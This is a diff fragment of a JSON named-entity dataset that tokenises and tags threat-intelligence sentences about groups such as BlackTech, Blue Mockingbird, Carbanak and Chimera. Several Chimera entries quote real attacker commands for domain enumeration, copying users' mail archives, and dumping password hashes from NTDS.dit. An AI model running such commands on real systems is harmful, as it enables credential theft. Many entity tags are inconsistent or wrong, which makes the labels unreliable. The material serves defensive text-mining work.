"used", + "NetCat", + "and", + "PortQry", + "to", + "enumerate", + "network", + "connections", + "and", + "display", + "the", + "status", + "of", + "related", + "TCP", + "and", + "UDP", + "ports." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "BackdoorDiplomacy", + "has", + "obtained", + "a", + "variety", + "of", + "open-source", + "reconnaissance", + "and", + "red", + "team", + "tools", + "for", + "discovery", + "and", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BackdoorDiplomacy", + "has", + "used", + "web", + "shells", + "to", + "establish", + "an", + "initial", + "foothold", + "and", + "for", + "lateral", + "movement", + "within", + "a", + "victim's", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackOasis's", + "first", + "stage", + "shellcode", + "contains", + "a", + "NOP", + "sled", + "with", + "alternative", + "instructions", + "that", + "was", + "likely", + "designed", + "to", + "bypass", + "antivirus", + "tools." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackTech", + "has", + "used", + "stolen", + "code-signing", + "certificates", + "for", + "its", + "malicious", + "payloads." + ], + "ner_tags": [ + "O", + "O", + "O", + "I-OffAct", + "B-Purp", + "B-OffAct", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackTech", + "has", + "used", + "DLL", + "side", + "loading", + "by", + "giving", + "DLLs", + "hardcoded", + "names", + "and", + "placing", + "them", + "in", + "searched", + "directories." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "I-Way", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackTech", + "has", + "used", + "valid,", + "stolen", + "digital", + "certificates", + "for", + "some", + "of", + "their", + "malware", + "and", + "tools." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackTech", + "has", + "exploited", + "a", + "buffer", + "overflow", + "vulnerability", + "in", + "Microsoft", + "Internet", + "Information", + "Services", + "(IIS)", + "6.0,", + "CVE-2017-7269,", + "in", + "order", + "to", + "establish", + "a", + "new", + "HTTP", + "or", + "command", + "and", + "control", + "(C2)", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Exp", + "O", + "B-Exp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackTech", + "has", + "exploited", + "multiple", + "vulnerabilities", + "for", + "execution,", + "including", + "Microsoft", + "Office", + "vulnerabilities", + "CVE-2012-0158,", + "CVE-2014-6352,", + "CVE-2017-0199,", + "and", + "Adobe", + "Flash", + "CVE-2015-5119." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Exp", + "I-Exp", + "I-Exp", + "B-Features", + "B-Features", + "B-Features", + "O", + "I-Tool", + "I-Tool", + "B-Features" + ] + }, + { + "tokens": [ + "BlackTech", + "has", + "used", + "e-mails", + "with", + "malicious", + "documents", + "to", + "lure", + "victims", + "into", + "installing", + "malware." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackTech", + "has", + "used", + "e-mails", + "with", + "malicious", + "links", + "to", + "lure", + "victims", + "into", + "installing", + "malware." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackTech", + "has", + "used", + "built-in", + "API", + "functions." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackTech", + "has", + "used", + "the", + "SNScan", + "tool", + "to", + "find", + "other", + "potential", + "targets", + "on", + "victim", + "networks." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackTech", + "has", + "used", + "right-to-left-override", + "to", + "obfuscate", + "the", + "filenames", + "of", + "malicious", + "e-mail", + "attachments." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "BlackTech", + "has", + "used", + "Putty", + "for", + "remote", + "access." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "I-OffAct", + "O" + ] + }, + { + "tokens": [ + "BlackTech", + "has", + "used", + "spearphishing", + "e-mails", + "with", + "malicious", + "password-protected", + "archived", + "files", + "(ZIP", + "or", + "RAR)", + "to", + "deliver", + "malware." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackTech", + "has", + "used", + "spearphishing", + "e-mails", + "with", + "links", + "to", + "cloud", + "services", + "to", + "deliver", + "malware." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BlackTech", + "has", + "obtained", + "and", + "used", + "tools", + "such", + "as", + "Putty,", + "SNScan,", + "and", + "PsExec", + "for", + "its", + "operations." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Blue", + "Mockingbird", + "has", + "used", + "JuicyPotato", + "to", + "abuse", + "the", + "<code>SeImpersonate</code>", + "token", + "privilege", + "to", + "escalate", + "from", + "web", + "application", + "pool", + "accounts", + "to", + "NT", + "Authority\\SYSTEM." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Blue", + "Mockingbird", + "has", + "used", + "wmic.exe", + "and", + "Windows", + "Registry", + "modifications", + "to", + "set", + "the", + "COR_PROFILER", + "environment", + "variable", + "to", + "execute", + "a", + "malicious", + "DLL", + "whenever", + "a", + "process", + "loads", + "the", + ".NET", + "CLR." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Blue", + "Mockingbird", + "has", + "obfuscated", + "the", + "wallet", + "address", + "in", + "the", + "payload", + "binary." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Blue", + "Mockingbird", + "has", + "gained", + "initial", + "access", + "by", + "exploiting", + "CVE-2019-18935,", + "a", + "vulnerability", + "within", + "Telerik", + "UI", + "for", + "ASP.NET", + "AJAX." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SecTeam" + ] + }, + { + "tokens": [ + "Blue", + "Mockingbird", + "has", + "used", + "Mimikatz", + "to", + "retrieve", + "credentials", + "from", + "LSASS", + "memory." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Blue", + "Mockingbird", + "has", + "masqueraded", + "their", + "XMRIG", + "payload", + "name", + "by", + "naming", + "it", + "wercplsupporte.dll", + "after", + "the", + "legitimate", + "wercplsupport.dll", + "file." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Blue", + "Mockingbird", + "has", + "used", + "Windows", + "Registry", + "modifications", + "to", + "specify", + "a", + "DLL", + "payload." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Blue", + "Mockingbird", + "has", + "used", + "PowerShell", + "reverse", + "TCP", + "shells", + "to", + "issue", + "interactive", + "commands", + "over", + "a", + "network", + "connection." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "I-Tool", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Blue", + "Mockingbird", + "has", + "used", + "frp,", + "ssf,", + "and", + "Venom", + "to", + "establish", + "SOCKS", + "proxy", + "connections." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Blue", + "Mockingbird", + "has", + "executed", + "custom-compiled", + "XMRIG", + "miner", + "DLLs", + "using", + "regsvr32.exe." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Blue", + "Mockingbird", + "has", + "used", + "Remote", + "Desktop", + "to", + "log", + "on", + "to", + "servers", + "interactively", + "and", + "manually", + "copy", + "files", + "to", + "remote", + "hosts." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Blue", + "Mockingbird", + "has", + "used", + "XMRIG", + "to", + "mine", + "cryptocurrency", + "on", + "victim", + "systems." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Blue", + "Mockingbird", + "has", + "executed", + "custom-compiled", + "XMRIG", + "miner", + "DLLs", + "using", + "rundll32.exe." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Blue", + "Mockingbird", + "has", + "used", + "Windows", + "Explorer", + "to", + "manually", + "copy", + "malicious", + "files", + "to", + "remote", + "hosts", + "over", + "SMB." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Blue", + "Mockingbird", + "has", + "used", + "Windows", + "Scheduled", + "Tasks", + "to", + "establish", + "persistence", + "on", + "local", + "and", + "remote", + "hosts." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Blue", + "Mockingbird", + "has", + "executed", + "custom-compiled", + "XMRIG", + "miner", + "DLLs", + "by", + "configuring", + "them", + "to", + "execute", + "via", + "the", + "\"wercplsupport\"", + "service." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Blue", + "Mockingbird", + "has", + "collected", + "hardware", + "details", + "for", + "the", + "victim's", + "system,", + "including", + "CPU", + "and", + "memory", + "information." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Blue", + "Mockingbird", + "has", + "obtained", + "and", + "used", + "tools", + "such", + "as", + "Mimikatz." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Blue", + "Mockingbird", + "has", + "used", + "batch", + "script", + "files", + "to", + "automate", + "execution", + "and", + "deployment", + "of", + "payloads." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Blue", + "Mockingbird", + "has", + "used", + "wmic.exe", + "to", + "set", + "environment", + "variables." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Blue", + "Mockingbird", + "has", + "used", + "mofcomp.exe", + "to", + "establish", + "WMI", + "Event", + "Subscription", + "persistence", + "mechanisms", + "configured", + "from", + "a", + "*.mof", + "file." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Blue", + "Mockingbird", + "has", + "made", + "their", + "XMRIG", + "payloads", + "persistent", + "as", + "a", + "Windows", + "Service." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CURIUM", + "has", + "exfiltrated", + "data", + "from", + "a", + "compromised", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CURIUM", + "has", + "lured", + "users", + "into", + "opening", + "malicious", + "files", + "delivered", + "via", + "social", + "media." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "I-Idus", + "O" + ] + }, + { + "tokens": [ + "CURIUM", + "has", + "established", + "a", + "network", + "of", + "fictitious", + "social", + "media", + "accounts,", + "including", + "on", + "Facebook", + "and", + "LinkedIn,", + "to", + "establish", + "relationships", + "with", + "victims,", + "often", + "posing", + "as", + "an", + "attractive", + "woman." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Idus", + "I-Idus", + "O", + "O", + "O", + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CURIUM", + "has", + "used", + "social", + "media", + "to", + "deliver", + "malicious", + "files", + "to", + "victims." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Idus", + "I-Idus", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "Carbanak", + "has", + "used", + "a", + "VBScript", + "named", + "\"ggldr\"", + "that", + "uses", + "Google", + "Apps", + "Script,", + "Sheets,", + "and", + "Forms", + "services", + "for", + "C2." + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Carbanak", + "may", + "use", + "netsh", + "to", + "add", + "local", + "firewall", + "rule", + "exceptions." + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carbanak", + "has", + "copied", + "legitimate", + "service", + "names", + "to", + "use", + "for", + "malicious", + "services." + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carbanak", + "has", + "named", + "malware", + "\"svchost.exe,\"", + "which", + "is", + "the", + "name", + "of", + "the", + "Windows", + "shared", + "service", + "host", + "program." + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carbanak", + "used", + "legitimate", + "programs", + "such", + "as", + "AmmyyAdmin", + "and", + "Team", + "Viewer", + "for", + "remote", + "interactive", + "C2", + "to", + "target", + "systems." + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carbanak", + "installs", + "VNC", + "server", + "software", + "that", + "executes", + "through", + "rundll32." + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carbanak", + "has", + "obtained", + "and", + "used", + "open-source", + "tools", + "such", + "as", + "PsExec", + "and", + "Mimikatz." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Carbanak", + "actors", + "used", + "legitimate", + "credentials", + "of", + "banking", + "employees", + "to", + "perform", + "operations", + "that", + "sent", + "them", + "millions", + "of", + "dollars." + ], + "ner_tags": [ + "B-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "I-Org", + "I-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O" + ] + }, + { + "tokens": [ + "Carbanak", + "malware", + "installs", + "itself", + "as", + "a", + "service", + "to", + "provide", + "persistence", + "and", + "SYSTEM", + "privileges." + ], + "ner_tags": [ + "B-Features", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "used", + "gzip", + "for", + "Linux", + "OS", + "and", + "a", + "modified", + "RAR", + "software", + "to", + "archive", + "data", + "on", + "Windows", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "used", + "custom", + "DLLs", + "for", + "continuous", + "retrieval", + "of", + "data", + "from", + "memory." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "used", + "<code>type", + "\\\\<hostname>\\c$\\Users\\<username>\\Favorites\\Links\\Bookmarks", + "bar\\Imported", + "From", + "IE\\*citrix*</code>", + "for", + "bookmark", + "discovery." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "cleared", + "event", + "logs", + "on", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "encoded", + "PowerShell", + "commands." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "used", + "credential", + "stuffing", + "against", + "victim's", + "remote", + "services", + "to", + "obtain", + "valid", + "accounts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "collected", + "credentials", + "for", + "the", + "target", + "organization", + "from", + "previous", + "breaches", + "for", + "use", + "in", + "brute", + "force", + "attacks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "I-OffAct", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "used", + "side", + "loading", + "to", + "place", + "malicious", + "DLLs", + "in", + "memory." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "used", + "Cobalt", + "Strike", + "to", + "encapsulate", + "C2", + "in", + "DNS", + "traffic." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "collected", + "data", + "of", + "interest", + "from", + "network", + "shares." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "has", + "used", + "<code>net", + "user", + "/dom</code>", + "and", + "<code>net", + "user", + "Administrator</code>", + "to", + "enumerate", + "domain", + "accounts", + "including", + "administrator", + "accounts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "used", + "compromised", + "domain", + "accounts", + "to", + "gain", + "access", + "to", + "the", + "target", + "environment." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera's", + "malware", + "has", + "altered", + "the", + "NTLM", + "authentication", + "program", + "on", + "domain", + "controllers", + "to", + "allow", + "Chimera", + "to", + "login", + "without", + "a", + "valid", + "credential." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "<code>nltest", + "/domain_trusts</code>", + "to", + "identify", + "domain", + "trust", + "relationships." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "used", + "Cobalt", + "Strike", + "C2", + "beacons", + "for", + "data", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "exfiltrated", + "stolen", + "data", + "to", + "OneDrive", + "accounts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "used", + "legitimate", + "credentials", + "to", + "login", + "to", + "an", + "external", + "VPN,", + "Citrix,", + "SSH,", + "and", + "other", + "remote", + "services." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "performed", + "file", + "deletion", + "to", + "evade", + "detection." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "utilized", + "multiple", + "commands", + "to", + "identify", + "data", + "of", + "interest", + "in", + "file", + "and", + "directory", + "listings." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "remotely", + "copied", + "tools", + "and", + "malware", + "onto", + "targeted", + "systems." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "copied", + "tools", + "between", + "compromised", + "hosts", + "using", + "SMB." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "used", + "<code>net", + "user</code>", + "for", + "account", + "discovery." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "staged", + "stolen", + "data", + "locally", + "on", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "harvested", + "data", + "from", + "victim's", + "e-mail", + "including", + "through", + "execution", + "of", + "<code>wmic", + "/node:<ip>", + "process", + "call", + "create", + "\"cmd", + "/c", + "copy", + "c:\\Users\\<username>\\<path>\\backup.pst", + "c:\\windows\\temp\\backup.pst\"", + "copy", + "\"i:\\<path>\\<username>\\My", + "Documents\\<filename>.pst\"", + "copy</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "used", + "<code>net", + "localgroup", + "administrators</code>", + "to", + "identify", + "accounts", + "with", + "local", + "administrative", + "rights." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "renamed", + "malware", + "to", + "GoogleUpdate.exe", + "and", + "WinRAR", + "to", + "jucheck.exe,", + "RecordedTV.ms,", + "teredo.tmp,", + "update.exe,", + "and", + "msadcs1.exe." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "registered", + "alternate", + "phone", + "numbers", + "for", + "compromised", + "users", + "to", + "intercept", + "2FA", + "codes", + "sent", + "via", + "SMS." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "gathered", + "the", + "SYSTEM", + "registry", + "and", + "ntds.dit", + "files", + "from", + "target", + "systems.", + "Chimera", + "specifically", + "has", + "used", + "the", + "NtdsAudit", + "tool", + "to", + "dump", + "the", + "password", + "hashes", + "of", + "domain", + "users", + "via", + "<code>msadcs.exe", + "\"NTDS.dit\"", + "-s", + "\"SYSTEM\"", + "-p", + "RecordedTV_pdmp.txt", + "--users-csv", + "RecordedTV_users.csv</code>", + "and", + "used", + "ntdsutil", + "to", + "copy", + "the", + "Active", + "Directory", + "database." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "used", + "direct", + "Windows", + "system", + "calls", + "by", + "leveraging", + "Dumpert." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "used", + "the", + "<code>get", + "-b", + "<start", + "ip>", + "-e", + "<end", + "ip>", + "-p</code>", + "command", + "for", + "network", + "scanning", + "as", + "well", + "as", + "a", + "custom", + "Python", + "tool", + "packed", + "into", + "a", + "Windows", + "executable", + "named", + "Get.exe", + "to", + "scan", + "IP", + "ranges", + "for", + "HTTP." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Chimera", + "has", + "used", + "<code>net", + "share</code>", + "and", + "<code>net", + "view</code>", + "to", + "identify", + "network", + "shares", + "of", + "interest." + ], + "ner_tags": [ + "B-Idus", + 